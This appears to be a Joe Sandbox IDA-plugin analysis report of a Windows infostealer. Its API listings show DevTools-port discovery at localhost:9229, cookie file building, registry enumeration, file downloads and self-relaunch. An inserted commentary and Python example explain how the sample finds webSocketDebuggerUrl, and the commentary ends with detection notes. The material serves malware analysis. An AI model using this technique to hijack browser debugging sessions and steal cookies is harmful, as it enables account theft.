                                    • Opcode ID: 85b0e20f27cb81bba132d1d9052f7ae7aa8969d41a5127437779337ac45b7ffb
                                    • Instruction ID: 85a3d2e4827ba140c22ee6ace9770ee893e4d796a5949eb7738ee64a0f972757
                                    • Opcode Fuzzy Hash: 85b0e20f27cb81bba132d1d9052f7ae7aa8969d41a5127437779337ac45b7ffb
                                    • Instruction Fuzzy Hash: 4AB19431A112169BCB21EFB8E8899EF77F5AF55700F044539F845AB613DB30ED058B91
                                    APIs
                                      • Part of subcall function 000A90C0: InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A90DF
                                      • Part of subcall function 000A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000A90FC
                                      • Part of subcall function 000A90C0: InternetCloseHandle.WININET(00000000), ref: 000A9109
                                    • strlen.MSVCRT ref: 000A92E1
                                    • strlen.MSVCRT ref: 000A92FA
                                      • Part of subcall function 000A8980: std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                    • strlen.MSVCRT ref: 000A9399
                                    • strlen.MSVCRT ref: 000A93E6
                                    • lstrcat.KERNEL32(?,cookies), ref: 000A9547
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000A9559
                                    • lstrcat.KERNEL32(?,?), ref: 000A956A
                                    • lstrcat.KERNEL32(?,000D4B98), ref: 000A957C
                                    • lstrcat.KERNEL32(?,?), ref: 000A958D
                                    • lstrcat.KERNEL32(?,.txt), ref: 000A959F
                                    • lstrlen.KERNEL32(?), ref: 000A95B6
                                    • lstrlen.KERNEL32(?), ref: 000A95DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A9614
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 2927ea7a6e20cea3b8b8b3c50e2607d4bb220dd5957df3e275da6a24ee82d437
                                    • Instruction ID: 9e2be29e1e8b94313afac6d43c1395a0f4a7962955949fa1999b61455d04d2e0
                                    • Opcode Fuzzy Hash: 2927ea7a6e20cea3b8b8b3c50e2607d4bb220dd5957df3e275da6a24ee82d437
                                    • Instruction Fuzzy Hash: FDE11571E10218EFDF10DFE8D885ADEBBB5AF59300F1044AAE509A7251EB349E45CF91
                                    APIs
                                    • memset.MSVCRT ref: 000BD9A1
                                    • memset.MSVCRT ref: 000BD9B3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BD9DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDA0E
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BDA1C
                                    • lstrcat.KERNEL32(?,00E6E098), ref: 000BDA36
                                    • lstrcat.KERNEL32(?,?), ref: 000BDA4A
                                    • lstrcat.KERNEL32(?,00E6CDE8), ref: 000BDA5E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDA8E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BDA95
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BDAFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2367105040-0
                                    • Opcode ID: 906917cc3deadac2aef7788f45885ebdb36ef21ebca0ce134e929ad36e9464c9
                                    • Instruction ID: fe57103522a5efd39d578cb3dff3b01d81bdd5911e4c2dc2476d549dc3c1dbc1
                                    • Opcode Fuzzy Hash: 906917cc3deadac2aef7788f45885ebdb36ef21ebca0ce134e929ad36e9464c9
                                    • Instruction Fuzzy Hash: 5CB19271D10219AFDB10EFA4DC889EEB7B9BF48300F14456AF909E7251EB309E45CB51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AB330
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB37E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB3A9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AB3B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB3D9
                                    • lstrlen.KERNEL32(000D4C50), ref: 000AB450
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB474
                                    • lstrcat.KERNEL32(00000000,000D4C50), ref: 000AB480
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB4A9
                                    • lstrlen.KERNEL32(00000000), ref: 000AB52D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB557
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AB55F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB587
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000AB5FE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB622
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000AB62E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB65E
                                    • lstrlen.KERNEL32(?), ref: 000AB767
                                    • lstrlen.KERNEL32(?), ref: 000AB776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB79E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 60c620921027291f7b3f051e5e7f8f5f6897e3d5e0a34df71ee77119324b766e
                                    • Instruction ID: 93fccf4144dfd62230598477cd517c97dd18587ab77702475b8458f724c31d3f
                                    • Opcode Fuzzy Hash: 60c620921027291f7b3f051e5e7f8f5f6897e3d5e0a34df71ee77119324b766e
                                    • Instruction Fuzzy Hash: FB024130E01615CFCB65DFA9D949BAAB7F1AF46305F18806EE4099B263D775DC82CB80
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • RegOpenKeyExA.ADVAPI32(?,00E6AC70,00000000,00020019,?), ref: 000C37BD
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000C37F7
                                    • wsprintfA.USER32 ref: 000C3822
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 000C3840
                                    • RegCloseKey.ADVAPI32(?), ref: 000C384E
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3858
                                    • RegQueryValueExA.ADVAPI32(?,00E6DE70,00000000,000F003F,?,?), ref: 000C38A1
                                    • lstrlen.KERNEL32(?), ref: 000C38B6
                                    • RegQueryValueExA.ADVAPI32(?,00E6DDF8,00000000,000F003F,?,00000400), ref: 000C3927
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3972
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3989
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 13140697-3278919252
                                    • Opcode ID: 2d8a8f5fb950dd89241b8d0fda76954a7412a3ba667032af4f1b6e7e5fc35813
                                    • Instruction ID: 804508bb0266e007d5efd2deec938b06843e0f1dc184b23c222695d6f95a4062
                                    • Opcode Fuzzy Hash: 2d8a8f5fb950dd89241b8d0fda76954a7412a3ba667032af4f1b6e7e5fc35813
                                    • Instruction Fuzzy Hash: 02914972D112089FCB10DFA4D984EEEB7B9FB48310F14856EE509AB251D731AE45CFA0
                                    APIs
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A90DF
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000A90FC
                                    • InternetCloseHandle.WININET(00000000), ref: 000A9109
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 000A9166
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 000A9197
                                    • InternetCloseHandle.WININET(00000000), ref: 000A91A2
                                    • InternetCloseHandle.WININET(00000000), ref: 000A91A9
                                    • strlen.MSVCRT ref: 000A91BA
                                    • strlen.MSVCRT ref: 000A91ED
                                    • strlen.MSVCRT ref: 000A922E
                                    • strlen.MSVCRT ref: 000A924C
                                      • Part of subcall function 000A8980: std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: 3d439c0af2891c49ef8d66bca0bde1523d8d2bd64b650b527c27377dfe4727dd
                                    • Instruction ID: 0e95a6145fd922699f33cde0f0951f287472b385965a6ff0943354d36bd3447d
                                    • Opcode Fuzzy Hash: 3d439c0af2891c49ef8d66bca0bde1523d8d2bd64b650b527c27377dfe4727dd
                                    • Instruction Fuzzy Hash: C251B271B00205ABE710DBE8DC49FEEB7F9DB48720F14016AF508E7281DBB4EA4587A5
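The routine above opens http://localhost:9229/json with WinINet and then scans the response body for the literals "webSocketDebuggerUrl": and "ws://. That is the discovery document of the DevTools protocol: port 9229 is the Node.js inspector default, and a Chromium-based browser started with --remote-debugging-port serves the same /json document, whose webSocketDebuggerUrl values name the sockets a client can drive. The earlier function on this page whose strings include /devtools, cookies and ws://localhost:9229 is the likely consumer of the URL found here. The Python below is an added example, not code from the sample or from Joe Sandbox: it embeds a constructed /json body of the documented shape (target id, title and script path are invented), extracts the socket URL both by the substring scan the two string literals suggest and by a proper JSON parse, and checks that the result is a loopback inspector endpoint.

```python
"""Parse a DevTools /json discovery response, two ways.

Added example; not the sample's code. SAMPLE_JSON is constructed to mirror what
GET http://localhost:9229/json returns for a single inspector target.
"""
import json
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample body (id, title and url are invented for this example).
SAMPLE_JSON = """[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?experiments=true&v8only=true&ws=localhost:9229/1a2b3c4d-0000-4000-8000-000000000001",
  "faviconUrl": "https://nodejs.org/static/images/favicons/favicon.ico",
  "id": "1a2b3c4d-0000-4000-8000-000000000001",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/1a2b3c4d-0000-4000-8000-000000000001"
} ]
"""

WS_KEY = '"webSocketDebuggerUrl":'   # literal present in the sample's string table
WS_PREFIX = '"ws://'                 # literal present in the sample's string table


def scrape_ws_url(body: str) -> Optional[str]:
    """Substring scan in the style the two string literals suggest.

    Locate the first "webSocketDebuggerUrl": key, then the "ws:// that follows
    it, and copy up to the closing quote. Returns None if a marker is absent,
    so a target advertised as wss:// would be missed by this approach.
    """
    key_at = body.find(WS_KEY)
    if key_at < 0:
        return None
    start = body.find(WS_PREFIX, key_at + len(WS_KEY))
    if start < 0:
        return None
    start += 1                       # step past the opening quote
    end = body.find('"', start)
    if end < 0:
        return None
    return body[start:end]


def parse_ws_urls(body: str) -> List[str]:
    """Proper JSON parse of the same document: every target's socket URL."""
    targets = json.loads(body)
    return [t["webSocketDebuggerUrl"] for t in targets if "webSocketDebuggerUrl" in t]


def is_loopback_devtools_endpoint(url: str, ports=(9229, 9222)) -> bool:
    """True for a ws:// URL on the local host using a default inspector port.

    9229 is the Node.js inspector default; 9222 is the customary Chromium
    --remote-debugging-port value. Both endpoints speak the same protocol.
    """
    parts = urlsplit(url)
    return (
        parts.scheme == "ws"
        and parts.hostname in ("localhost", "127.0.0.1", "::1")
        and parts.port in ports
    )


if __name__ == "__main__":
    url = scrape_ws_url(SAMPLE_JSON)
    print("scraped :", url)
    print("parsed  :", parse_ws_urls(SAMPLE_JSON))
    print("loopback:", is_loopback_devtools_endpoint(url))
```

On a well-formed document the scrape and the parse agree, but the scrape returns only the first target and needs the URL to begin with ws://, while the JSON parse returns all of them. For detection, the distinctive artefacts are a non-browser, non-developer process requesting http://localhost:9229/json (here via WinINet) and a browser or node process on the host running with --remote-debugging-port.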
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 000C16A1
                                    • lstrcpy.KERNEL32(00000000,00E5B180), ref: 000C16CC
                                    • lstrlen.KERNEL32(?), ref: 000C16D9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C16F6
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C1704
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C172A
                                    • lstrlen.KERNEL32(00E69B38), ref: 000C173F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1762
                                    • lstrcat.KERNEL32(00000000,00E69B38), ref: 000C176A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1792
                                    • ShellExecuteEx.SHELL32(?), ref: 000C17CD
                                    • ExitProcess.KERNEL32 ref: 000C1803
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: 4787a8a84286a9dc7ef4ff2063b7af85b390b01bf755409ebcf16ea11f82d500
                                    • Instruction ID: e4294a7f4f4d33f6d1d76463d126f939858ec0e0ef7655f5348f9e40934e8464
                                    • Opcode Fuzzy Hash: 4787a8a84286a9dc7ef4ff2063b7af85b390b01bf755409ebcf16ea11f82d500
                                    • Instruction Fuzzy Hash: AE517271E02219EBDB51DFA4DC88ADEB7F9AF55300F54413AF505E7252EB30AE018B90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6AFF
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A6B2C
                                    • StrCmpCA.SHLWAPI(?,00E6E578), ref: 000A6B4A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 000A6B6A
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000A6B88
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000A6BA1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000A6BC6
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000A6BF0
                                    • CloseHandle.KERNEL32(00000000), ref: 000A6C10
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6C17
                                    • InternetCloseHandle.WININET(?), ref: 000A6C21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID: x
                                    • API String ID: 2500263513-2890206012
                                    • Opcode ID: a61c490935199c99bb5c316f4b6075b4addb4c456836d2b48e8cebebfb7840e0
                                    • Instruction ID: eaa4b18c8ce6c693c1564df827c0c706a246dde3f679a915834a623fc5bf0d33
                                    • Opcode Fuzzy Hash: a61c490935199c99bb5c316f4b6075b4addb4c456836d2b48e8cebebfb7840e0
                                    • Instruction Fuzzy Hash: 4E41A171A10205AFDB20DFA4EC49FEE77B8EB04701F444465FA05E7190EF70AD448BA4
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEFE4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF012
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000BF026
                                    • lstrlen.KERNEL32(00000000), ref: 000BF035
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 000BF053
                                    • StrStrA.SHLWAPI(00000000,?), ref: 000BF081
                                    • lstrlen.KERNEL32(?), ref: 000BF094
                                    • lstrlen.KERNEL32(00000000), ref: 000BF0B2
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BF0FF
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BF13F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
